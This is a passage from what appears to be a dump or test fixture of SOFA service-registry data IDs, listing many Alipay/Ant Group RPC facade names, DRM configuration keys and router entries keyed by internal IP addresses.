.DRM","DATA_ID_30.45.132.54#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.unitestcenter.common.service.facade.api.InspectionPaymentUserManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfquote.common.service.facade.api.QuoteManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:publicDomain_securitydata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniprod.common.service.facade.share.api.MiniShareTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCustCertifyInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.cfpcenter.cfpcenter_misc_ds.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_10.15.240.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acpartner.common.service.facade.LicenseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sccore.facade.UserBindFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dt.dataphin.tenant.client.biz.service.ResearchDevelopmentSpecConfigService:1.0:dpsecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsign.common.service.facade.strategy.SpiStrategyFacade:1.0:accordercore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcp_easy_member_renew@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insscenemarket.common.facade.InsMktMascotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.122#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipayplus.mobile.component.common.facade.transit.TransitCertificateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:minipcodemarket@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_FILE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.hyp.common.service.facade.AbossSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.137#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fintranscore.common.service.facade.trans.TransDateCalculateFacade:1.0:bkftranscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.rendedatahandler.modifyData,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insiop.common.service.facade.content.InsIopAnswerMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bollywoodprod.common.service.facade.api.ClientUserDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.facade.CertBindingQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecision.service.api.PayAssetConsultDecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:FUND_SCHEME_BUS_INFO_MANAGE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ilimitcenter.service.facade.api.LimitAccumulateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdchecker.service.analyze.spi.SecurityReverseService:1.0:finreconchecker@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:iMatchfacadeAntProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkAutoType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.39.178.125#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileapp.common.service.facade.login.UserLoginServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.ProtocolConsistService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.96.159#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openmonitor.cloudmonitor.service.facade.MonitorDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:imasp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlbs.facade.tag.TagMetaInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.AntVip-Server:name=com.alipay.antvip.server.conf.DrmControl.intervalMsWhenRaising,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.bigfish:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mirrorprod.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.access.PermissionsManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.trade.accountgold.CommoditiesLimitQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.operation.CommodityShopOperationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-Ipayment-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acccenter.common.inner.service.process.ProcessTemplateFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.almcenter.service.facade.api.cashpool.AlmCashPoolQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.almanalysis.common.service.facade.api.PlanDetailCommandFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetinsight.common.service.facade.api.ProductPoolManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.updateResourceJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sportsprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acsubscriberprod.facade.service.SendEventFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:contentlib@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.decision.facade.FdSceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.96.45#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cloudprovision:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.facade.ProfileService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.gmp.openplatform.facade.AppClientServiceFacade:1.0:gmp-openplatform-plugin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.exceptionana.QuickInvestigationTaskItemService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ZPARAMCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.zqualitydatacore.common.service.facade.TestAccountRelationManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.50.120.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.253.15#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.25.167.124#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.25.200.81#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.metadata.common.service.tr.ram.PrivilegeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.203.5#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.charityprod.common.service.integration.cif.UserAgreementInconsistentQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.30.109#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.aliinvoiceprod.integration.einvoice.EinvoiceItemServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fascore.common.service.facade.local.FinishRefundServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.biz.service.impl.test.CacheServiceTest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.igopcore.common.service.facade.api.sandbox.SandboxOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.admin.service.SceneProductActionPacketFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.facade.asset.api.InsUserFamilyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iacctrans.service.facade.api.CacheBackCfgQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.chargefront.GoldenDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antbrain.facade.message.api.MessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:rockcodecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.decisionx.facade.api.DxBranchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.bizprod.common.service.facade.api.merchant.MerchantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.riskmng.core.service.drm.impl.SocialUniformEventSwitchImpl.complainContentDeleteEvent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bbcmng.common.service.facade.CqcBranchRuleQueryFacade:1.0:zmbbcmngService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmarket.service.PcreditMarketTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.NoticeFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.promokernel.common.checker.facade.api.CampQueryCheckerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradequery.common.service.facade.TradeLogisticsQueryFacade:1.0:tradequeryprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.tag.TagQueryFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotvilla.common.service.facade.api.manager.QuotEventManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:insmerchantprod_insWOProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirefront.service.facade.api.AcquireRefundCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.ProductIntentionFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antmember.common.service.facade.BenefitExchangeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.service.loan.impl.support.drm.LpLoanApplyConfigDrm.deferCmdProcessNotRetryErrCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:bahamut@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:edubizsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:serverlesscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ipromofront.common.service.facade.service.rpc.CertQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.img.ImgQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.shadowKeySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpromoscene.common.service.facade.api.task.TaskTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.archimedes.common.service.facade.api.DashboardService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fcamlcloud.common.service.facade.api.AmlSiftService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:arcstudio@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.pam.PamResourcePermissionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.138.168#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.done.common.service.facade.v1.service.DoneTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0.0:lifemngChargeoffInstAccountCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:test-server@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_FININFLUX#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.0.167.246#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nodejs.ConsumerService:1.0:stat@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fpdecision.dfriskmng.facade.DxDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:ipaypdf@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:emccenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qagraphknowledge.common.service.facade.linke.LinkePluginResultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:cicada#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cfpcenter.common.service.facade.specialbusiness.api.query.CfpCardCardTransferQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.service.facade.AccountAsyncTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findefencecore.core.service.dandan.dandan.repository.DbUnitRelateRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:ngfemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cifcommon.business.platform.o2o.facade.BrokerInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.rulecenter:name=com.alipay.rulecenter.core.engine.drm.impl.TreeTravelDRMEStrategy.algorithmStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insptmarket.client.history.extension.HistorySnapshotFetcherComponent:1.0:inshealthprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-zappinfo-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zconsole.zproxy.ZproxyTrafficSwitchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trsdesk.common.service.facade.biz.BizQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.assets.api.facade.service.TableInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ANTFEATUREMETA#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yingxutestTBaseCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promocenter.facade.api.HumanToHumanKoiRewardActivityManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.darwin.common.service.facade.api.MetricDsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.FreezeReceiptService:1.0:pcreditprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.sampleRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antthoth.service.facade.aidesk.AlgoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.basicnamecontrol.BasicNameControlService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.223#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finpwm.facade.smartant.SmartAntCSQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:kbshopdetail@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:newAutoAccessProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_YW#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbservcore.common.service.facade.spi.config.KbProxyConfigGrayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insserviceprod.facade.InsSerExchangePlanMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.SelectedResourceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkcloudfunds.service.facade.depository.api.CommonSignServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbomp.biz.element.deliver.handler.MerchantLabelInnerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatabusPayInfoTairCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minitrans.service.facade.mcard.api.MCardtransManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.common.service.integration.mobileha.AnthaTinyappChangeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.232.16#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.38.36.236#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:shopCategoryLicenseValidator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.cif.common.service.facade.api.UserServiceFacade:1.0:fscCifService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bumng.common.service.facade.BusinessLineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.MerchantUserBindingQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lendpofprod.common.service.facade.api.repay.LendRepayQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciaasconnectorcore.facade.client.BasicParamClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.paydecision.AssetTypeCfgManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tss.supportprod.facade.cptor.facade.manage.CptorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdpmng.facade.inspect.RoundInspectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.mosn.MosnAppInvokeService:1.0:gfsettle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insunderwritingcore.common.service.ApplicationUnderwritingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.spi.DataLoadService:1.0:fincommontaskhub@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agap.service.facade.mng.api.AoneTaskMngService:1.0:tcService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.authprod.facade.scope.AuthScopeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.zcache.tbase.loadTestZdatabusTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.trsbrain.common.service.facade.proto.DbSelfCureService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.menu.MenuFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.withdraw.api.ApplyAsyncContractService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxiandataproc.common.service.api.RenewApplyNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.CustomizationWriteDbQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.ShopPageQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.26.204#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.publiccore.biz.service.impl.rpc.LifeServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdsdatahub.service.facade.quota.QuotaCalcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecsign.common.service.facade.contract.ContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.service.facade.permission.PermissionGroupServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.irecon.common.service.query.fund.api.QueryFundApiToTranscodeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.shadowExpireTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ck:name=com.alipay.zdal.config.groupCluster.finslip_finmngDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundprotocol.common.service.facade.CustomerInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.punishcenter.common.service.facade.process.VoucherService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unattended.facade.decision.ChangeDecisionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.cloudbox.web.home.drm.ReferrerCheckWhiteListDrmResource.tempUrlWhiteListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:antwaf@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.CTURuleExcludeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_EXCHANGE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ifxposition.service.facade.position.FxPositionIntraDayQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.college.material.MaterialFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.pointprod.common.service.pointlibrary.api.PointLibraryReceiptService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kbservcenter.common.service.facade.notice.NoticeActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencyDoubleCheck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kmi.common.service.facade.PgpKeyQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.pdcore.common.service.facade.isp.ProdApiPackageServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.232.122#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDowngradeDrmImpl.subjectIdRecDowngrade,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.selectcore.common.service.facade.api.SelectSceneManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.inspect.LifeInspectServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.176.116#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antfeaturecloud.common.service.facade.FeatureComputingFacade:1.0:PromoPlatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:lifemock_invokeFactoryProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zbdm.common.service.facade.schema.MetaSchemaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.common.service.facade.recommend.LisaRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hyp.common.service.facade.HyUniformTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.core.service.airpay.OfflinePayVoucherService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.limiter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zpublishuiweb:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaDegradeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mfinquotationprod:name=com.alipay.mfinquotationprod.common.service.facade.drm.MfinquotationprodLDCDrmConfig.openLDCSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.loa